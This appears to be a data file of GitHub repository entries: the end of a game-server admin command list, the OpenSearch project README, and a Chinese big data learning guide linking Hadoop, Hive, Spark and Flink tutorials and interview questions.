/heal. Heals your avatars.
/help. Displays a list of available commands.
/kick @[player id]. Kicks a player from the server.
/mail [content]. Sends the targeted player a system mail.
/permission {add | remove | clear} [permission]. Gives/removes a permission from the targeted player.
/refill. Refills your skill points in the open world.
/reload. Reloads the server config.
/scene [scene id] [floor id]. Teleports the player to the specified scene.
/spawn [monster/prop id] x[amount] s[stage id]. Spawns a monster or prop near the targeted player.
/stop. Stops the server.
/unstuck @[player id]. Unstucks an offline player if they're in a scene that doesn't load.
/worldlevel [world level]. Sets the targeted player's equilibrium level.
```
0
opensearch-project/OpenSearch
🔎 Open source distributed and RESTful search engine.
analytics apache2 foss hacktoberfest java search search-engine
<img src="https://opensearch.org/assets/img/opensearch-logo-themed.svg" height="64px"> [![Chat](https://img.shields.io/badge/chat-on%20forums-blue)](https://forum.opensearch.org/c/opensearch/) [![Documentation](https://img.shields.io/badge/documentation-reference-blue)](https://opensearch.org/docs/latest/opensearch/index/) [![Code Coverage](https://codecov.io/gh/opensearch-project/OpenSearch/branch/main/graph/badge.svg)](https://codecov.io/gh/opensearch-project/OpenSearch) [![Untriaged Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/untriaged?labelColor=red)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A"untriaged") [![Security Vulnerabilities](https://img.shields.io/github/issues/opensearch-project/OpenSearch/security%20vulnerability?labelColor=red)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A"security%20vulnerability") [![Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch)](https://github.com/opensearch-project/OpenSearch/issues) [![Open Pull Requests](https://img.shields.io/github/issues-pr/opensearch-project/OpenSearch)](https://github.com/opensearch-project/OpenSearch/pulls) [![2.14.0 Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/v2.14.0)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A"v2.14.0") [![3.0.0 Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/v3.0.0)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A"v3.0.0") [![GHA gradle check](https://github.com/opensearch-project/OpenSearch/actions/workflows/gradle-check.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/gradle-check.yml) [![GHA validate pull request](https://github.com/opensearch-project/OpenSearch/actions/workflows/wrapper.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/wrapper.yml) [![GHA precommit](https://github.com/opensearch-project/OpenSearch/actions/workflows/precommit.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/precommit.yml) [![Jenkins gradle check job](https://img.shields.io/jenkins/build?jobUrl=https%3A%2F%2Fbuild.ci.opensearch.org%2Fjob%2Fgradle-check%2F&label=Jenkins%20Gradle%20Check)](https://build.ci.opensearch.org/job/gradle-check/) - [Welcome!](#welcome) - [Project Resources](#project-resources) - [Code of Conduct](#code-of-conduct) - [Security](#security) - [License](#license) - [Copyright](#copyright) - [Trademark](#trademark) ## Welcome! **OpenSearch** is [a community-driven, open source fork](https://aws.amazon.com/blogs/opensource/introducing-opensearch/) of [Elasticsearch](https://en.wikipedia.org/wiki/Elasticsearch) and [Kibana](https://en.wikipedia.org/wiki/Kibana) following the [license change](https://blog.opensource.org/the-sspl-is-not-an-open-source-license/) in early 2021. We're looking to sustain (and evolve!) a search and analytics suite for the multitude of businesses who are dependent on the rights granted by the original, [Apache v2.0 License](LICENSE.txt). ## Project Resources * [Project Website](https://opensearch.org/) * [Downloads](https://opensearch.org/downloads.html) * [Documentation](https://opensearch.org/docs/) * Need help? 
Try [Forums](https://discuss.opendistrocommunity.dev/) * [Project Principles](https://opensearch.org/#principles) * [Contributing to OpenSearch](CONTRIBUTING.md) * [Maintainer Responsibilities](MAINTAINERS.md) * [Release Management](RELEASING.md) * [Admin Responsibilities](ADMINS.md) * [Testing](TESTING.md) * [Security](SECURITY.md) ## Code of Conduct This project has adopted the [Amazon Open Source Code of Conduct](CODE_OF_CONDUCT.md). For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq), or contact [opensource-codeofconduct@amazon.com](mailto:opensource-codeofconduct@amazon.com) with any additional questions or comments. ## Security If you discover a potential security issue in this project we ask that you notify AWS/Amazon Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/) or directly via email to aws-security@amazon.com. Please do **not** create a public GitHub issue. ## License This project is licensed under the [Apache v2.0 License](LICENSE.txt). ## Copyright Copyright OpenSearch Contributors. See [NOTICE](NOTICE.txt) for details. ## Trademark OpenSearch is a registered trademark of Amazon Web Services. OpenSearch includes certain Apache-licensed Elasticsearch code from Elasticsearch B.V. and other source code. Elasticsearch B.V. is not the source of that other source code. ELASTICSEARCH is a registered trademark of Elasticsearch B.V.
0
MoRan1607/BigDataGuide
Big data learning: learn big data from scratch, with study videos and interview materials for every stage of the learning path
bigdata flink flume hadoop hbase hive javase kafka scala spark zookeeper
Big Data Learning Guide
===
> A big data learning guide: learn big data development from scratch, with resources collected for every stage of the journey.

## Official WeChat account

Follow my WeChat official account, **旧时光大数据**, and reply with the matching keyword to get more big data material.<br>
For the videos and documents in the "big data learning path" that I have watched myself, the cloud-drive links are available directly from the account.

## <font color=blue>Updates in progress...</font>

#### Nowcoder (牛客网) interview write-ups

#### Big data interview questions

### "[Big Data Interview Questions V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ)" is out; reply "大数据面试题" to the account

<p align="center"> <img src="https://github.com/MoRan1607/BigDataGuide/blob/master/Pics/%E5%85%AC%E4%BC%97%E5%8F%B7%E4%BA%8C%E7%BB%B4%E7%A0%81.jpg" width="200" height="200"/> <p align="center"> </p> </p>

## Knowledge Planet

The Knowledge Planet (知识星球) includes a **learning path**, **learning materials** (three editions, split by programming language: Java, Python, Java+Scala), projects (**50+ big data projects**), interview questions (**700+ real big data interview questions**, plus Java basics, computer networks, and Redis), **1000+ real big data interview write-ups**, 600+ real Java backend interview write-ups (sorted by company), and my own notes from the study videos.

**[Introduction to the Knowledge Planet materials](https://www.yuque.com/vxo919/gyyog3/ohvyc2e38pprcxkn?singleDoc=)**

<p align="center"> <img src="https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E6%98%9F%E7%90%83%E4%BC%98%E6%83%A0%E5%88%B8%20(1).png" width="300" height="387"/> <p align="center"> </p> </p>

Overview
---
[An introduction to big data](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%AE%80%E4%BB%8B.md)

[An introduction to big-data-related roles](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%9B%B8%E5%85%B3%E5%B2%97%E4%BD%8D%E4%BB%8B%E7%BB%8D.md)

Big data learning path
---
For the videos and documents in the learning path, follow the official account 旧时光大数据 and reply with the matching keyword to get the cloud-drive links.

[Big data learning path (with links to the videos I watched)](https://github.com/Dr11ft/BigDataGuide/blob/master/Docs/%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF.md)

Programming languages
---
For programming languages, I suggest JavaSE first, and Scala before Spark and Flink. If time is tight, just pick a Java edition of a Spark or Flink course. Python depends on your preference and the job, though with a Java foundation Python comes much faster. (Don't ask me how to study; the answer is: study as hard as you possibly can.)

### 1. JavaSE (pick one of the two)

[Liu Yi, 2019 edition](https://www.bilibili.com/video/BV1gb411F76B?from=search&seid=16116797084076868427)

[Shang Silicon Valley, Song Hongkang edition](https://www.bilibili.com/video/BV1Kb411W75N?from=search&seid=9321658006825735818)

### 2. Scala (pick one of the two)

If you are short on time, go straight to one of the three-to-five-day courses bundled with a Spark course for a quick overview.

[Han Shunping's edition](https://www.bilibili.com/video/BV1Mp4y1e7B5?from=search&seid=5450215228532207134)

[Wu Shengran's edition (Tsinghua master's)](https://www.bilibili.com/video/BV1Mp4y1e7B5?from=search&seid=5450215228532207134)

### 3. Python

I recommend the Heima (黑马) Python videos: easy to follow, with fairly complete documents. With a Java foundation, Python is quick to pick up.

[Heima Python videos](https://www.bilibili.com/video/BV1C4411A7ej?from=search&seid=11669436417044703145)

[Python documents and notes](https://github.com/MoRan1607/BigDataGuide/blob/master/Python/Python%E6%96%87%E6%A1%A3.md)

Linux
---
[Fully distributed cluster setup document](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/%E5%88%86%E5%B8%83%E5%BC%8F%E9%9B%86%E7%BE%A4%E6%90%AD%E5%BB%BA.md)

For installing the VM and the remote-login tools, you can refer to my blog for now and follow the matching steps there.

[Cluster setup](https://blog.csdn.net/qq_41544550/category_9458240.html)

Big data frameworks and components
---
### 1. Hadoop

&emsp; 1. [Hadoop: the HDFS distributed file system](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS.md)

&emsp; 2. [Hadoop: HDFS shell operations](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS%E7%9A%84Shell%E6%93%8D%E4%BD%9C.md)

&emsp; 3. [Hadoop: the HDFS Java API](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/HDFS%E7%9A%84Java%20API%E6%93%8D%E4%BD%9C.md)

&emsp; 4. [Hadoop: the MapReduce distributed computing framework](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/MapReduce.md)

&emsp; 5. [Hadoop: MapReduce examples](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/MapReduce%E6%A1%88%E4%BE%8B.md)

&emsp; 6. [Hadoop: the YARN resource scheduler](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/YARN.md)

&emsp; 7.
[Hadoop: data compression in Hadoop](https://github.com/Dr11ft/BigDataGuide/blob/master/Hadoop/Hadoop%E6%95%B0%E6%8D%AE%E5%8E%8B%E7%BC%A9.md)

### 2. Zookeeper

&emsp; 1. [Zookeeper: overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%B8%80%EF%BC%89.md)

&emsp; 2. [Zookeeper: standalone and distributed installation](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%BA%8C%EF%BC%89.md)

&emsp; 3. [Zookeeper: client commands](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%B8%89%EF%BC%89.md)

&emsp; 4. [Zookeeper: internals](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E5%9B%9B%EF%BC%89.md)

&emsp; 5. [Zookeeper: hands-on practice](https://github.com/Dr11ft/BigDataGuide/blob/master/Zookeeper/Zookeeper%EF%BC%88%E4%BA%94%EF%BC%89.md)

### 3. Hive

&emsp; 1. [Hive: overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/1%E3%80%81Hive%E6%A6%82%E8%BF%B0.md)

&emsp; 2. [Hive: data types](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/2%E3%80%81Hive%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B.md)

&emsp; 3. [Hive: DDL data definition](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/3%E3%80%81Hive%20DDL%E6%95%B0%E6%8D%AE.md)

&emsp; 4. [Hive: DML data operations](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/4%E3%80%81Hive%20DML%E6%95%B0%E6%8D%AE%E6%93%8D%E4%BD%9C.md)

&emsp; 5. [Hive: queries](https://github.com/Dr11ft/BigDataGuide/blob/master/Hive/5%E3%80%81Hive%E6%9F%A5%E8%AF%A2.md)

&emsp; 6. [Hive: functions](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/6%E3%80%81Hive%E5%87%BD%E6%95%B0.md)

&emsp; 7. [Hive: compression and storage](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/7%E3%80%81Hive%E5%8E%8B%E7%BC%A9%E5%92%8C%E5%AD%98%E5%82%A8.md)

&emsp; 8. [Hive hands-on: computing the usual metrics for a video website](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/8%E3%80%81Hive%E5%AE%9E%E6%88%98%EF%BC%9A%E7%BB%9F%E8%AE%A1%E5%BD%B1%E9%9F%B3%E8%A7%86%E9%A2%91%E7%BD%91%E7%AB%99%E7%9A%84%E5%B8%B8%E8%A7%84%E6%8C%87%E6%A0%87.md)

&emsp; 9. [Hive: partitioned and bucketed tables](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/9%E3%80%81%E5%88%86%E5%8C%BA%E8%A1%A8%E5%92%8C%E5%88%86%E6%A1%B6%E8%A1%A8.md)

&emsp; 10. [Hive: enterprise-level tuning](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/10%E3%80%81Hive%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B0%83%E4%BC%98.md)

### 4. Flume

&emsp; 1. [Flume: overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/1%E3%80%81Flume%E6%A6%82%E8%BF%B0.md)

&emsp; 2. [Flume: hands-on operations](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/2%E3%80%81Flume%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md)

&emsp; 3. [Flume: examples](https://github.com/Dr11ft/BigDataGuide/blob/master/Flume/3%E3%80%81Flume%E6%A1%88%E4%BE%8B.md)

### 5. Kafka

&emsp; 1. [Kafka: overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/1%E3%80%81Kafka%E6%A6%82%E8%BF%B0.md)

&emsp; 2. [Kafka: in-depth analysis](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/2%E3%80%81Kafka%E6%B7%B1%E5%85%A5%E8%A7%A3%E6%9E%90.md)

&emsp; 3. [Kafka: API operations in practice](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/3%E3%80%81Kafka%20API%E6%93%8D%E4%BD%9C%E5%AE%9E%E8%B7%B5.md)

&emsp; 4. [Kafka: integrating Kafka with Flume in practice](https://github.com/Dr11ft/BigDataGuide/blob/master/Kafka/4%E3%80%81Flume%E5%AF%B9%E6%8E%A5Kafka%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md)

### 6. HBase

&emsp; 1. [HBase: overview](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/1%E3%80%81HBase%E6%A6%82%E8%BF%B0.md)
&emsp; 2. [HBase: data structures](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/2%E3%80%81HBase%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84.md)

&emsp; 3. [HBase: shell operations](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/3%E3%80%81HBase%20Shell%E6%93%8D%E4%BD%9C.md)

&emsp; 4. [HBase: API operations in practice](https://github.com/Dr11ft/BigDataGuide/blob/master/HBase/4%E3%80%81HBase%20API%E5%AE%9E%E8%B7%B5%E6%93%8D%E4%BD%9C.md)

### 7. Spark

#### Spark basics

&emsp; 1. [Spark basics: the birth of Spark](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/1%E3%80%81Spark%E7%9A%84%E8%AF%9E%E7%94%9F.md)

&emsp; 2. [Spark basics: overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/2%E3%80%81Spark%E6%A6%82%E8%BF%B0.md)

&emsp; 3. [Spark basics: run modes](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/3%E3%80%81Spark%E8%BF%90%E8%A1%8C%E6%A8%A1%E5%BC%8F.md)

&emsp; 4. [Spark basics: case practice](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/2%E3%80%81Spark%E6%A6%82%E8%BF%B0.md)

#### Spark Core

&emsp; 1. [Spark Core: RDD overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/1%E3%80%81RDD%E6%A6%82%E8%BF%B0.md)

&emsp; 2. [Spark Core: RDD programming (1)](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/2%E3%80%81RDD%E7%BC%96%E7%A8%8B%EF%BC%88%E4%B8%80%EF%BC%89.md)

&emsp; 3. [Spark Core: RDD programming (2)](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/3%E3%80%81RDD%E7%BC%96%E7%A8%8B%EF%BC%882%EF%BC%89.md)

&emsp; 4. [Spark Core: partitioners for key-value RDDs](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/4%E3%80%81%E9%94%AE%E5%80%BC%E5%AF%B9RDD%E6%95%B0%E6%8D%AE%E5%88%86%E5%8C%BA%E5%99%A8.md)

&emsp; 5. [Spark Core: reading and saving data](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Core/5%E3%80%81%E6%95%B0%E6%8D%AE%E8%AF%BB%E5%8F%96%E4%B8%8E%E4%BF%9D%E5%AD%98.md)

#### Spark SQL

&emsp; 1. [Spark SQL: overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/1%E3%80%81Spark%20SQL%E6%A6%82%E8%BF%B0.md)

&emsp; 2. [Spark SQL: programming](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/2%E3%80%81Spark%20SQL%E7%BC%96%E7%A8%8B.md)

&emsp; 3. [Spark SQL: loading and saving data](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/3%E3%80%81Spark%20SQL%E6%95%B0%E6%8D%AE%E7%9A%84%E5%8A%A0%E8%BD%BD%E4%B8%8E%E4%BF%9D%E5%AD%98.md)

&emsp; 4. [Spark SQL: hands-on practice](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/4%E3%80%81Spark%20SQL%E5%AE%9E%E6%88%98.md)

#### Spark Streaming

&emsp; 1. [Spark Streaming: overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/1%E3%80%81Spark%20Streaming%E6%A6%82%E8%BF%B0.md)

&emsp; 2. [Spark Streaming: DStream basics](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/2%E3%80%81Dstream%E5%9F%BA%E7%A1%80.md)

&emsp; 3. [Spark Streaming: DStream transformations & output](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/3%E3%80%81Dstream%E7%9A%84%E8%BD%AC%E6%8D%A2%26%E8%BE%93%E5%87%BA.md)

### 8. Flink

&emsp; 1. [Flink: core overview](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/1%E3%80%81Flink%E6%A6%82%E8%BF%B0.md)

&emsp; 2. [Flink: deployment](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/2%E3%80%81Flink%E9%83%A8%E7%BD%B2.md)

&emsp; 3. [Flink: runtime architecture](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/3、Flink运行架构.md)

&emsp; 4. [Flink: the stream-processing API](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/4%E3%80%81Flink%E6%B5%81%E5%A4%84%E7%90%86API.md)
&emsp; 5. [Flink: windows in Flink](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/5%E3%80%81Flink%E4%B8%AD%E7%9A%84Window.md)

&emsp; 6. [Flink: time semantics and watermarks](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/6、时间语义与Wartermark.md)

&emsp; 7. [Flink: the ProcessFunction API (low-level API)](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/7%E3%80%81ProcessFunction%20API%EF%BC%88%E5%BA%95%E5%B1%82API%EF%BC%89.md)

&emsp; 8. [Flink: state programming and fault tolerance](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/8%E3%80%81%E7%8A%B6%E6%80%81%E7%BC%96%E7%A8%8B%E5%92%8C%E5%AE%B9%E9%94%99%E6%9C%BA%E5%88%B6.md)

&emsp; 9. [Flink: the Table API and SQL](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/9%E3%80%81Table%20API%20%E4%B8%8ESQL.md)

&emsp; 10. [Flink: Flink CEP](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/10%E3%80%81Flink%20CEP.md)

Data warehousing
---
&emsp; [A summary of data warehousing](https://zhuanlan.zhihu.com/p/371365562)

Big data projects
---
&emsp; **Picking three or four is basically enough; search the project names directly on Bilibili, each has videos.**

&emsp; **For details, reply "大数据项目" to the official account (旧时光大数据).**

Reading notes
---
#### Notes on "The Road to Big Data" (《阿里大数据之路》, Alibaba)

[Chapter 1: Overview](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E3%80%8A%E9%98%BF%E9%87%8C%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B9%8B%E8%B7%AF%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0%EF%BC%9A%E7%AC%AC%E4%B8%80%E7%AB%A0%20%E6%80%BB%E8%BF%B0.md)

[Chapter 2: Log collection](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E7%AC%AC%E4%BA%8C%E7%AB%A0%EF%BC%9A%E6%97%A5%E5%BF%97%E9%87%87%E9%9B%86.pdf)

[Chapter 3: Data synchronization](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/PDF/%E7%AC%AC%E4%B8%89%E7%AB%A0%EF%BC%9A%E6%95%B0%E6%8D%AE%E5%90%8C%E6%AD%A5.pdf)

[Chapter 4: Offline data development](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/PDF/%E7%AC%AC%E5%9B%9B%E7%AB%A0%EF%BC%9A%E7%A6%BB%E7%BA%BF%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91.pdf)

Interview questions
---
> #### Continuously being updated... The full set (700+ original questions from nowcoder interview write-ups) is in the Knowledge Planet.

### [Big Data Interview Questions V1.0](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E8%AF%95%E9%A2%98%20V1.0.md)

### [Big Data Interview Questions V3.0](https://mp.weixin.qq.com/s/hMcuDEkzH49rfSmGWy_GRg)

### [Big Data Interview Questions V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ)

#### 1. Hadoop

##### 1. Hadoop basics

[Introduce Hadoop](https://blog.csdn.net/qq_41544550/article/details/123031348)

[The small-files problem in Hadoop](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Hadoop%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93/Hadoop/Hadoop%E5%B0%8F%E6%96%87%E4%BB%B6%E5%A4%84%E7%90%86%E9%97%AE%E9%A2%98.md)

[The processes in Hadoop and what they do](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop%E4%B8%AD%E7%9A%84%E5%87%A0%E4%B8%AA%E8%BF%9B%E7%A8%8B%E5%92%8C%E4%BD%9C%E7%94%A8.pdf)

[How are the numbers of mappers and reducers in Hadoop determined? What does the number of reducers depend on?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop%E7%9A%84mapper%E5%92%8Creducer%E7%9A%84%E4%B8%AA%E6%95%B0%E5%A6%82%E4%BD%95%E7%A1%AE%E5%AE%9A%EF%BC%9Freducer%E7%9A%84%E4%B8%AA%E6%95%B0%E4%BE%9D%E6%8D%AE%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.md)

##### 2. HDFS

[The HDFS read and write flow](https://blog.csdn.net/qq_41544550/article/details/103113335)
[HDFS的block为什么是128M?增大或减小有什么影响?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/HDFS%E7%9A%84block%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF128M%EF%BC%9F%E5%A2%9E%E5%A4%A7%E6%88%96%E5%87%8F%E5%B0%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D%EF%BC%9F/HDFS%E7%9A%84block%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF128M%EF%BC%9F%E5%A2%9E%E5%A4%A7%E6%88%96%E5%87%8F%E5%B0%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D.md) ##### 3、MapReduce [介绍下MapReduce](https://blog.csdn.net/qq_41544550/article/details/123674103) [MapReduce优缺点](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Hadoop%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93/Hadoop/MapReduce%E4%BC%98%E7%BC%BA%E7%82%B9.md) [MapReduce工作原理(流程)](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/MapReduce%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86%EF%BC%88%E6%B5%81%E7%A8%8B%EF%BC%89.pdf) [MapReduce压缩方式](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/MapReduce%E5%8E%8B%E7%BC%A9%E6%96%B9%E5%BC%8F.pdf) ##### 4、YARN [介绍下YARN](https://blog.csdn.net/qq_41544550/article/details/123826496?spm=1001.2014.3001.5501) #### 二、Zookeeper [介绍下Zookeeper是什么?](https://blog.csdn.net/qq_41544550/article/details/123148663) [Zookeeper有什么作用?优缺点?有什么应用场景?](https://blog.csdn.net/qq_41544550/article/details/123148688) [Zookeeper架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Zookeeper/%E9%9D%A2%E8%AF%95%E9%A2%98/Zookeeper%E6%9E%B6%E6%9E%84.pdf) #### 三、Hive [说下为什么要使用Hive?Hive的优缺点?Hive的作用是什么?](https://blog.csdn.net/qq_41544550/article/details/123333839) [Hive的用户自定义函数实现步骤与流程](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B.md) [Hive分区和分桶的区别](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E5%88%86%E5%8C%BA%E5%92%8C%E5%88%86%E6%A1%B6%E7%9A%84%E5%8C%BA%E5%88%AB.md) [Hive的cluster by 、sort by、distribute by 、order by 区别?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E7%9A%84cluster%20by%20%E3%80%81sort%20by%E3%80%81distribute%20by%20%E3%80%81order%20by%20%E5%8C%BA%E5%88%AB%EF%BC%9F.pdf) [Hive count(distinct)有几个reduce,海量数据会有什么问题?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%20count(distinct)%E6%9C%89%E5%87%A0%E4%B8%AAreduce%EF%BC%8C%E6%B5%B7%E9%87%8F%E6%95%B0%E6%8D%AE%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%EF%BC%9F.pdf) #### 四、Flume [介绍下Flume](https://blog.csdn.net/qq_41544550/article/details/123451528?spm=1001.2014.3001.5501) 
